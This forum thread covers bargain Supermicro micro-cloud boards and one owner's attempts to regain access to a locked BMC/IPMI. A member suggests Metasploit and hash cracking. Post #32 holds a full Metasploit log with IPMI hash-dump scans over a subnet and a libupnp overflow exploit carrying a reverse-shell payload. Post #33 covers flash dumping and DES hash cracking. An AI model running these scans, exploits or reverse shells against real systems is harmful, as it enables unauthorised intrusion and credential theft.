EU ebay: Supermicro X10SLE-F (Micro-Cloud node) usually under 10 Euro

Discussion in 'Great Deals' started by DanAnd, Jun 23, 2019.

  1. RageBone

    RageBone Active Member

    Joined:
    Jul 11, 2017
    Messages:
    164
    Likes Received:
    27
    @DanAnd
    Another option would be to Metasploit the IPMI.
    There are a few things you can do with that. The most time-consuming would be to retrieve the hash of the password, which you'd need to crack.

    If you have soldering skills and equipment, you could also swap the ROM that the IPMI is stored on.
     
    #21
  2. DanAnd

    DanAnd New Member

    Joined:
    Jul 25, 2016
    Messages:
    28
    Likes Received:
    8
    @Guillem and @Aestr

    Thanks for the hints. I ordered the cable from an official Supermicro reseller (18 Euros + shipping).

    @RageBone
    That's also a good way to get on it. I would be able to do both, so I have a second and third plan if I get stuck. Thanks!
     
    #22
  3. RageBone

    RageBone Active Member

    #23
  4. nerdalertdk

    nerdalertdk Member

    Joined:
    Mar 9, 2017
    Messages:
    80
    Likes Received:
    13
    Just bought two with heat sink for 80$ including postage :)
     
    #24
  5. nerdalertdk

    nerdalertdk Member

    @DanAnd what cooler did you use?
     
    #25
  6. DanAnd

    DanAnd New Member

    I recycled an old Supermicro "E6-2600 (LGA 2011) Narrow ILM" CPU cooler out of a 1U server. I will probably exchange it for a larger-volume one when I am able to run it (still waiting for the console cable delivery) and I am sure how much space I have around the chassis.


     
    #26
  7. DanAnd

    DanAnd New Member

    And by the way: I couldn't "hack" the IPMI interface with Metasploit. So I will have to wait for the console cable first.
     
    #27
  8. nerdalertdk

    nerdalertdk Member

    Okay, bought the ones that are for the server but wanted 2U more, just didn't know what fits


    Edit: hmm, this one seems to fit

    SNK-P0048PS
     
    #28
  9. DanAnd

    DanAnd New Member

    The console cable arrived today. However, it didn't help me so far. I am still not able to power up the mainboard.
    I contacted Supermicro Support, but I am not sure how good the chances are.
     
    #29
  10. nerdalertdk

    nerdalertdk Member

    That sucks, I have two on their way but I'm missing CPU and heatsink
     
    #30
  11. RageBone

    RageBone Active Member

    @DanAnd you should be able to get a list of users and the respective password hashes for them through Metasploit as a last resort.
    Could crack those hashes : )
     
    #31
  12. DanAnd

    DanAnd New Member

    As said, the IPMI Version is pretty safe, so all attempts didn't work out:
    Code:
           =[ metasploit v5.0.36-dev-                         ]
    + -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
    + -- --=[ 545 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    
    msf5 > use  auxiliary/scanner/ipmi/ipmi_version
    msf5 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 146.0.33.0/24
    RHOSTS => 146.0.33.0/24
    msf5 auxiliary(scanner/ipmi/ipmi_version) > run
    
    [*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
    [+] 146.0.33.34:623 - IPMI - IPMI-2.0 OEMID:4543232 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/ipmi/ipmi_version) >
    msf5 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 146.0.33.0/24
    RHOSTS => 146.0.33.0/24
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
    
    [*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) >
    msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 146.0.33.0/24
    RHOSTS => 146.0.33.0/24
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set THREADS 256
    THREADS => 256
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
    
    [*] Scanned  27 of 256 hosts (10% complete)
    [*] Scanned 134 of 256 hosts (52% complete)
    [*] Scanned 149 of 256 hosts (58% complete)
    [*] Scanned 225 of 256 hosts (87% complete)
    [*] Scanned 230 of 256 hosts (89% complete)
    [*] Scanned 231 of 256 hosts (90% complete)
    [*] Scanned 246 of 256 hosts (96% complete)
    [*] Scanned 253 of 256 hosts (98% complete)
    [*] Scanned 254 of 256 hosts (99% complete)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) >
    
           =[ metasploit v5.0.36-dev-                         ]
    + -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
    + -- --=[ 545 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    
    msf5 > use exploit/multi/upnp/libupnp_ssdp_overflow
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set RHOST 146.0.33.34
    RHOST => 146.0.33.34
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set LHOST 146.0.33.1
    LHOST => 146.0.33.1
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set PAYLOAD cmd/unix/reverse_openssl
    PAYLOAD => cmd/unix/reverse_openssl
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploid
    [-] Unknown command: exploid.
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploit
    
    [*] Started reverse double SSL handler on 146.0.33.1:4444
    [*] The system 146.0.33.34 did not reply to our M-SEARCH probe
    [-] Exploit aborted due to failure: no-target: No compatible target detected
    [*] Exploit completed, but no session was created.
    msf5 exploit(multi/upnp/libupnp_ssdp_overflow) >
    
     
    #32
  13. DanAnd

    DanAnd New Member

    So I did it the hard way:
    I looked for the BMC's flash chip, cleaned up the pins and used a chip grabber and SPI programmer to read out the flash.
    This was pretty straightforward, but I had to use an updated flashrom code, as the flash chip is a MX25L25635F, which was not included in the current Ubuntu Linux release that I am using.
    After figuring out the pin-outs, I connected GND, MISO, MOSI, CLK, CS, but left +3.3V open. Then I powered up the board and read everything from the flash chip into a file.

    Looking into the flash image, I found the wsman configuration, which points to a simple_auth.passwd file, which consists of 4 password hashes ;-)
    The encryption method used is pretty old: Traditional Unix Crypt (DES). That means the password is at max 8 characters long and the valid characters are 7-bit ASCII.

    The first user is obvious: ADMIN with the hashed password of ADMIN.
    Since ADMIN/ADMIN does not work with either IPMItool or the web interface, I assume they have disabled that user, which is quite clever, as every script kiddie will try to attempt the default usernames on IPMI interfaces.

    So there are 3 hashes left. I will give hashcat and my trusty Geforce 1060 GPU a try and hopefully I will figure out at least one password, so that I can do a factory reset. Then I can finally continue on my path to power up this little mainboard :)

    Cheers,

    Daniel
     
    #33
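
Added example (not part of the post above and not Supermicro code): an audit helper that classifies the hash scheme of every entry in a passwd-style file recovered from a firmware image and flags legacy formats such as the traditional DES crypt described in #33. The `user:hash` line layout, the function names and the sample entries are assumptions constructed for illustration; the hash strings are shape-only placeholders.

```python
import re

# Traditional DES crypt: 2 salt chars + 11 hash chars from the crypt(3) alphabet.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
# Modular crypt format ids -> scheme name.
MCF = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
       "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"empty", "descrypt", "md5crypt"}  # schemes this audit flags


def classify(field):
    """Return the scheme name for one hash field."""
    if field == "":
        return "empty"                      # no password set at all
    if field[0] in "!*":
        return "locked"                     # login disabled
    if field.startswith("$"):
        parts = field.split("$")
        return MCF.get(parts[1], "unknown") if len(parts) > 2 else "unknown"
    return "descrypt" if DES_CRYPT.match(field) else "unknown"


def des_facts(field):
    """Limits fixed by the descrypt format itself, whatever the password."""
    return {"salt": field[:2],
            "salt_space": 64 ** 2,          # 12-bit salt
            "max_password_len": 8,          # input is truncated to 8 chars
            "key_bits": 8 * 7}              # only the low 7 bits of each char


def audit(passwd_text):
    """Return (user, scheme, flagged) for each 'user:hash[:...]' line."""
    findings = []
    for line in passwd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, field = line.split(":")[:2]
        scheme = classify(field)
        findings.append((user, scheme, scheme in WEAK))
    return findings


# Constructed sample (assumed layout, placeholder hash strings).
SAMPLE = """\
user1:abCDEFGHIJKLM
user2:$1$saltsalt$0123456789abcdefghijkl
user3:$6$saltsalt$placeholder
user4:!
"""

if __name__ == "__main__":
    for row in audit(SAMPLE):
        print(row)
```
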
  14. nerdalertdk

    nerdalertdk Member

    I really hope they used the same password because this is above what I can do :)

    Nice work
     
    #34
  15. gigatexal

    gigatexal I'm here to learn

    Joined:
    Nov 25, 2012
    Messages:
    2,649
    Likes Received:
    482
    With the reach STH has, you would think someone would be either an employee of SM or connected to one, to be able to get the admin password or at least the magic song and dance to reset it once and for all.
     
    #35
  16. Guillem

    Guillem Member

    Joined:
    Nov 13, 2017
    Messages:
    32
    Likes Received:
    2
    So the issue is 'powering up' the server as in pressing the 'power on' button? It just stays on standby when you connect it? If that is the case, I bet there has to be a couple of pins you can short that are coming from the power distribution board that will power on the system. Either shorting them or pulling one up to 5V or down to ground.
     
    #36
  17. DanAnd

    DanAnd New Member

    That's exactly what I think will be the easiest way. I contacted Supermicro Support on it, but they have to call the SM HQ first.

    There are basically just 8 thin data cables coming from the chassis to the mainboard.
     
    #37
  18. Guillem

    Guillem Member

    So what happens when you press the power switch on the board? Does it even try to do something?
     
    #38
  19. DanAnd

    DanAnd New Member

    Pressing the Power-Button was basically the first thing I tried. Nothing is starting.
     
    #39
  20. Guillem

    Guillem Member

    I imagined you did, but just in case :)

    What I would suggest is to find, next to the thin cable connector on the motherboard, an IC for power control. A lot of times this is an ADMxxxx, which tends to be in a small package with somewhere between 16 and 30 pins. If you find that, I bet one of the pins is connected to the enable specified on the datasheet, so you will just need to figure out to which connector pin it's routed and provide the necessary voltage/gnd.
     
    #40
